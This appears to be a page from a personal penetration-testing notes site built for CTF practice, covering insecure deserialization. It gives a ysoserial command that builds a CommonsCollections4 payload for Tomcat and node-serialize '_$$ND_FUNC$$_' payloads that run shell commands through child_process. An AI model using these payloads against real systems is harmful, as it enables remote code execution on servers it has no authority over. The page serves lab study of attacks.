Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux πŸ‘‘
  • πŸͺŸWindows
    • Lateral Movement
    • PrivilageEsc Windows πŸ‘‘
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • πŸ› οΈTools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • πŸ”ŸOWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • πŸ“šDatabase
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • πŸ”—Binary Exploitation
    • Linux
    • Windows
  • πŸ‘¨β€πŸš’Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • πŸ”„Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • πŸ€–Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • πŸ“¦HackTheBox β€” Writeups
      • πŸ΄β€β˜ οΈHTB - Devvortex
Powered by GitBook
On this page
  • ​01. ysoserial​
  • 02. Node-serialize
  1. Other

Deserialization

PreviousCMS / Servers / OthersNextTryhackme

Last updated 2 years ago

​​

  • Every serialized object is stating from ac ed hex value.

curl -o ysoserial.jar https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar     

## ------------------| Apache Tomcat 9.0.27
java -jar ysoserial.jar CommonsCollections4 "ping -c 1 10.10.14.25" | base64 -w 0 | xclip -selection clipboard  

var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);

_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ping -c 1 10.10.14.22\', function(error, stdout, stderr) { console.log(stdout) });}()
_$$ND_FUNC$$_function (){require(\"child_process\").exec(\"ping -c 1 10.10.14.22\", function(error, stdout, stderr) { console.log(stdout) });}()                       
πŸ”„
01. ysoserial
02. Node-serialize